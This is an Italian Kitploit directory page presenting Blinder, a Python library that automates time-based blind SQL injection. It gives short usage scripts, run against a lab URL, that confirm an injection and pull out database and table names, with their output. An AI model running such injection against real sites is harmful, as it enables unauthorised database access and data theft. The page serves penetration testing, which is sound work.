Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blinder — Una libreria Python per automatizzare l'iniezione SQL cieca basata sul tempo. | Kitploit
Strumenti/GitHubGitHub/mhaskar/blinder
Analisi delle VulnerabilitàSicurezza WebPenetration TestingSicurezza dei Database
GitHubmhaskar/blinder

Blinder

Una libreria Python per automatizzare l'iniezione SQL cieca basata sul tempo.

Vedi Repository
50156 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Blinder

Blidner è una piccola libreria Python per automatizzare l'iniezione SQL basata sul tempo utilizzando query predefinite come funzioni per accelerare lo sviluppo di PoC.

Installazione

Puoi installare Blinder usando il seguente comando:

pip install blinder

Oppure scaricando il sorgente e importandolo manualmente nel tuo progetto.

Utilizzo

Per usare Blinder devi importare il modulo Blinder e poi iniziare a utilizzare le funzioni principali di Blinder.

Puoi usare Blinder (con la versione corrente) per fare quanto segue:

  • Verificare l'iniezione basata sul tempo.
  • Ottenere il nome del database.
  • Ottenere i nomi delle tabelle.

Puoi verificare l'iniezione in un URL usando il seguente codice:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

Il risultato dell'esecuzione sarà:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

Puoi ottenere il nome del database usando il seguente codice:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

E i risultati saranno:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

Per ottenere i nomi delle tabelle puoi usare il seguente codice:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

E i risultati saranno:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

Molte funzionalità dovrebbero essere aggiunte presto, come:

  • la possibilità di aggiungere query personalizzate
  • testare i punti di iniezione basati sulla richiesta di Burp
  • estrarre dati di tabelle/colonne
Scarica lo strumento